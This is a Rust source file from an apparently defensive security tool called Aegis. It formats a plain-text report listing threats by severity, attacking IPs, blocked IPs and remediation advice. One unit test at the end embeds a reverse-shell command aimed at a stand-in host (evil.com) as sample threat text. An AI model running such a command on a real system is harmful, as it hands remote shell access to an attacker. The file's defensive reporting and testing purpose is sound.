use std::collections::HashMap;
use std::fmt::Write;

use anyhow::Result;
use chrono::Utc;

use crate::core::state::AppState;
use crate::core::threat::{ThreatEvent, ThreatSeverity, ThreatType};

/// Generate a comprehensive plain-text security report from the current application
/// state. Includes a header, threats grouped by severity, top attacking IPs,
/// module-specific findings, and actionable recommendations.
pub fn generate_report(state: &AppState) -> Result<String> {
    let mut report = String::with_capacity(8192);

    // -----------------------------------------------------------------------
    // Header
    // -----------------------------------------------------------------------
    write_header(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Executive summary
    // -----------------------------------------------------------------------
    write_executive_summary(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Threats grouped by severity (Critical first)
    // -----------------------------------------------------------------------
    write_threats_by_severity(&mut report, &state.threats)?;

    // -----------------------------------------------------------------------
    // Top attacking IPs
    // -----------------------------------------------------------------------
    write_top_attacking_ips(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Module-specific findings
    // -----------------------------------------------------------------------
    write_module_findings(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Blocked IPs
    // -----------------------------------------------------------------------
    write_blocked_ips(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Recommendations
    // -----------------------------------------------------------------------
    write_recommendations(&mut report, state)?;

    // -----------------------------------------------------------------------
    // Footer
    // -----------------------------------------------------------------------
    writeln!(report)?;
    writeln!(report, "{}", "=".repeat(72))?;
    writeln!(
        report,
        "End of report. Generated by Aegis v{}",
        env!("CARGO_PKG_VERSION")
    )?;
    writeln!(report, "{}", "=".repeat(72))?;

    Ok(report)
}

// ---------------------------------------------------------------------------
// Section writers
// ---------------------------------------------------------------------------

fn write_header(report: &mut String, state: &AppState) -> Result<()> {
    let now = Utc::now();
    let uptime = now.signed_duration_since(state.started_at);
    let hours = uptime.num_hours();
    let minutes = uptime.num_minutes() % 60;
    let seconds = uptime.num_seconds() % 60;

    writeln!(report, "{}", "=".repeat(72))?;
    writeln!(report, "  AEGIS SECURITY REPORT")?;
    writeln!(report, "{}", "=".repeat(72))?;
    writeln!(report)?;
    writeln!(
        report,
        "  Generated at  : {}",
        now.format("%Y-%m-%d %H:%M:%S UTC")
    )?;
    writeln!(
        report,
        "  Session start : {}",
        state.started_at.format("%Y-%m-%d %H:%M:%S UTC")
    )?;
    writeln!(
        report,
        "  Duration      : {}h {}m {}s",
        hours, minutes, seconds
    )?;
    writeln!(report, "  Posture       : {}", state.posture)?;
    if !state.modules_run.is_empty() {
        let mut mods: Vec<&String> = state.modules_run.iter().collect();
        mods.sort();
        writeln!(
            report,
            "  Modules run   : {}",
            mods.iter()
                .map(|s| s.as_str())
                .collect::<Vec<_>>()
                .join(", ")
        )?;
    }
    writeln!(report)?;
    Ok(())
}

fn write_executive_summary(report: &mut String, state: &AppState) -> Result<()> {
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  EXECUTIVE SUMMARY")?;
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report)?;

    let counts = state.threat_counts();
    let total = state.threats.len();

    writeln!(report, "  Total threats detected: {}", total)?;
    let severities = [
        ThreatSeverity::Critical,
        ThreatSeverity::High,
        ThreatSeverity::Medium,
        ThreatSeverity::Low,
        ThreatSeverity::Info,
    ];
    for sev in &severities {
        let count = counts.get(sev).copied().unwrap_or(0);
        if count > 0 {
            writeln!(report, "    {:<10} : {}", sev, count)?;
        }
    }
    writeln!(
        report,
        "  Blocked IPs           : {}",
        state.blocked_ips.len()
    )?;

    let auto_count = state.threats.iter().filter(|t| t.auto_responded).count();
    if auto_count > 0 {
        writeln!(report, "  Auto-responded        : {}", auto_count)?;
    }
    writeln!(report)?;
    Ok(())
}

fn write_threats_by_severity(report: &mut String, threats: &[ThreatEvent]) -> Result<()> {
    if threats.is_empty() {
        writeln!(report, "  No threats detected.")?;
        writeln!(report)?;
        return Ok(());
    }

    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  THREATS BY SEVERITY")?;
    writeln!(report, "{}", "-".repeat(72))?;

    let severities = [
        ThreatSeverity::Critical,
        ThreatSeverity::High,
        ThreatSeverity::Medium,
        ThreatSeverity::Low,
        ThreatSeverity::Info,
    ];

    for sev in &severities {
        let group: Vec<&ThreatEvent> = threats.iter().filter(|t| t.severity == *sev).collect();
        if group.is_empty() {
            continue;
        }

        writeln!(report)?;
        writeln!(report, "  [{} - {} event(s)]", sev, group.len())?;
        for (i, t) in group.iter().enumerate() {
            writeln!(
                report,
                "    {}. [{}] {}",
                i + 1,
                t.threat_type,
                t.description
            )?;
            writeln!(
                report,
                "       Time: {} | Module: {} | ID: {}",
                t.timestamp.format("%H:%M:%S"),
                t.source_module,
                t.id
            )?;
            if let Some(ref ip) = t.source_ip {
                writeln!(report, "       Source IP: {}", ip)?;
            }
            if let Some(ref target) = t.target {
                writeln!(report, "       Target: {}", target)?;
            }
            if t.auto_responded {
                writeln!(report, "       Response: AUTO-RESPONDED")?;
            }
            if !t.details.is_empty() {
                for (k, v) in &t.details {
                    writeln!(report, "       {}: {}", k, v)?;
                }
            }
        }
    }
    writeln!(report)?;
    Ok(())
}

fn write_top_attacking_ips(report: &mut String, state: &AppState) -> Result<()> {
    let top_ips = state.top_attacking_ips(10);
    if top_ips.is_empty() {
        return Ok(());
    }

    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  TOP ATTACKING IP ADDRESSES")?;
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report)?;
    writeln!(report, "  {:<5} {:<40} {}", "#", "IP Address", "Events")?;
    writeln!(report, "  {}", "-".repeat(55))?;

    for (rank, (ip, count)) in top_ips.iter().enumerate() {
        let blocked = if state.blocked_ips.contains_key(ip) {
            " [BLOCKED]"
        } else {
            ""
        };
        writeln!(
            report,
            "  {:<5} {:<40} {}{}",
            rank + 1,
            ip.to_string(),
            count,
            blocked
        )?;
    }
    writeln!(report)?;
    Ok(())
}

fn write_module_findings(report: &mut String, state: &AppState) -> Result<()> {
    if state.threats.is_empty() {
        return Ok(());
    }

    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  MODULE-SPECIFIC FINDINGS")?;
    writeln!(report, "{}", "-".repeat(72))?;

    // Group threats by source module.
    let mut by_module: HashMap<&str, Vec<&ThreatEvent>> = HashMap::new();
    for t in &state.threats {
        by_module
            .entry(t.source_module.as_str())
            .or_default()
            .push(t);
    }

    let mut modules: Vec<&&str> = by_module.keys().collect();
    modules.sort();

    for module in modules {
        let threats = &by_module[*module];
        writeln!(report)?;
        writeln!(report, "  [{}] - {} finding(s)", module, threats.len())?;

        // Summarize by threat type within this module.
        let mut by_type: HashMap<&ThreatType, usize> = HashMap::new();
        for t in threats {
            *by_type.entry(&t.threat_type).or_insert(0) += 1;
        }
        let mut type_list: Vec<(&&ThreatType, &usize)> = by_type.iter().collect();
        type_list.sort_by(|a, b| b.1.cmp(a.1));

        for (tt, count) in type_list {
            writeln!(report, "    - {}: {} event(s)", tt, count)?;
        }
    }
    writeln!(report)?;
    Ok(())
}

fn write_blocked_ips(report: &mut String, state: &AppState) -> Result<()> {
    if state.blocked_ips.is_empty() {
        return Ok(());
    }

    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  BLOCKED IP ADDRESSES")?;
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report)?;

    let mut entries: Vec<_> = state.blocked_ips.values().collect();
    entries.sort_by_key(|e| e.blocked_at);

    for entry in entries {
        let expires = entry
            .expires_at
            .map(|t| t.format("%Y-%m-%d %H:%M:%S UTC").to_string())
            .unwrap_or_else(|| "never (permanent)".to_string());
        writeln!(
            report,
            "  {} | blocked {} | expires {} | {}{}",
            entry.ip,
            entry.blocked_at.format("%H:%M:%S"),
            expires,
            entry.reason,
            if entry.auto { " (auto)" } else { " (manual)" }
        )?;
    }
    writeln!(report)?;
    Ok(())
}

fn write_recommendations(report: &mut String, state: &AppState) -> Result<()> {
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report, "  RECOMMENDATIONS")?;
    writeln!(report, "{}", "-".repeat(72))?;
    writeln!(report)?;

    let mut recs: Vec<String> = Vec::new();

    // Build recommendations based on what was detected.
    let has = |tt: &ThreatType| -> bool { state.threats.iter().any(|t| &t.threat_type == tt) };

    if has(&ThreatType::BruteForce) {
        recs.push(
            "SSH brute-force attacks detected. Consider implementing fail2ban, \
             IP-based rate limiting, or switching to key-based authentication only."
                .to_string(),
        );
    }

    if has(&ThreatType::SynFlood) {
        recs.push(
            "SYN flood detected. Enable SYN cookies (sysctl net.ipv4.tcp_syncookies=1) \
             and consider upstream DDoS mitigation."
                .to_string(),
        );
    }

    if has(&ThreatType::CryptoMiner) {
        recs.push(
            "Crypto miner process detected. Investigate the process origin, kill it, \
             and audit how it was installed. Check for compromised accounts or services."
                .to_string(),
        );
    }

    if has(&ThreatType::ReverseShell) {
        recs.push(
            "CRITICAL: Reverse shell detected. This indicates active compromise. \
             Isolate the system immediately, preserve forensic evidence, and begin \
             incident response procedures."
                .to_string(),
        );
    }

    if has(&ThreatType::C2Beacon) {
        recs.push(
            "CRITICAL: C2 beacon pattern detected. The system may be part of a botnet. \
             Block the destination IP, investigate the process, and audit for lateral movement."
                .to_string(),
        );
    }

    if has(&ThreatType::SqlInjection) || has(&ThreatType::PathTraversal) {
        recs.push(
            "Web application attacks detected. Review application code for injection \
             vulnerabilities, deploy a WAF, and ensure all user inputs are sanitized."
                .to_string(),
        );
    }

    if has(&ThreatType::FileModified)
        || has(&ThreatType::FileAdded)
        || has(&ThreatType::FileDeleted)
    {
        recs.push(
            "File integrity changes detected. Verify changes are expected. If unexpected, \
             investigate for tampering and restore from known-good backups."
                .to_string(),
        );
    }

    if has(&ThreatType::ThreatIntelMatch) {
        recs.push(
            "Connections to known-malicious IPs detected. Block these IPs at the firewall, \
             investigate the originating processes, and audit for data exfiltration."
                .to_string(),
        );
    }

    if has(&ThreatType::ScannerProbe) {
        recs.push(
            "Vulnerability scanner probes detected. While these may be benign (security \
             audits), monitor for follow-up exploitation attempts."
                .to_string(),
        );
    }

    if has(&ThreatType::PortScan) {
        recs.push(
            "Port scanning activity detected. Review exposed services, close unnecessary \
             ports, and ensure firewall rules are restrictive."
                .to_string(),
        );
    }

    if has(&ThreatType::WebDdos) {
        recs.push(
            "Web DDoS activity detected. Consider rate limiting, deploying a CDN/reverse \
             proxy with DDoS protection, and blocking the offending IPs."
                .to_string(),
        );
    }

    if has(&ThreatType::RootLogin) {
        recs.push(
            "Direct root login detected. Disable direct root SSH access \
             (PermitRootLogin no) and use sudo for privilege escalation."
                .to_string(),
        );
    }

    if recs.is_empty() {
        if state.threats.is_empty() {
            writeln!(
                report,
                "  No threats detected. System appears secure. Continue monitoring."
            )?;
        } else {
            writeln!(
                report,
                "  Review the threats listed above and take appropriate action \
                 based on your organization's security policies."
            )?;
        }
    } else {
        for (i, rec) in recs.iter().enumerate() {
            writeln!(report, "  {}. {}", i + 1, rec)?;
            writeln!(report)?;
        }
    }

    Ok(())
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::core::state::AppState;
    use crate::core::threat::{ThreatEvent, ThreatType};
    use std::net::IpAddr;

    #[test]
    fn test_generate_report_empty_state() {
        let state = AppState::new();
        let report = generate_report(&state).unwrap();
        assert!(report.contains("AEGIS SECURITY REPORT"));
        assert!(report.contains("No threats detected"));
        assert!(report.contains("RECOMMENDATIONS"));
    }

    #[test]
    fn test_generate_report_with_threats() {
        let mut state = AppState::new();
        let ip: IpAddr = "203.0.113.42".parse().unwrap();

        state.add_threat(
            ThreatEvent::new(
                ThreatType::BruteForce,
                "auth",
                "SSH brute force from 203.0.113.42",
            )
            .with_source_ip(ip),
        );
        state.add_threat(
            ThreatEvent::new(
                ThreatType::PortScan,
                "network",
                "Port scan detected from 203.0.113.42",
            )
            .with_source_ip(ip),
        );
        state.mark_module_run("auth");
        state.mark_module_run("network");

        let report = generate_report(&state).unwrap();

        assert!(report.contains("THREATS BY SEVERITY"));
        assert!(report.contains("Brute Force"));
        assert!(report.contains("Port Scan"));
        assert!(report.contains("203.0.113.42"));
        assert!(report.contains("TOP ATTACKING IP ADDRESSES"));
        assert!(report.contains("MODULE-SPECIFIC FINDINGS"));
        assert!(report.contains("RECOMMENDATIONS"));
        assert!(report.contains("fail2ban")); // brute force recommendation
    }

    #[test]
    fn test_generate_report_critical_threats() {
        let mut state = AppState::new();
        state.add_threat(ThreatEvent::new(
            ThreatType::ReverseShell,
            "process",
            "Reverse shell detected: bash -i >& /dev/tcp/evil.com/4444",
        ));

        let report = generate_report(&state).unwrap();
        assert!(report.contains("CRITICAL"));
        assert!(report.contains("Reverse shell detected"));
        assert!(report.contains("incident response"));
    }
}
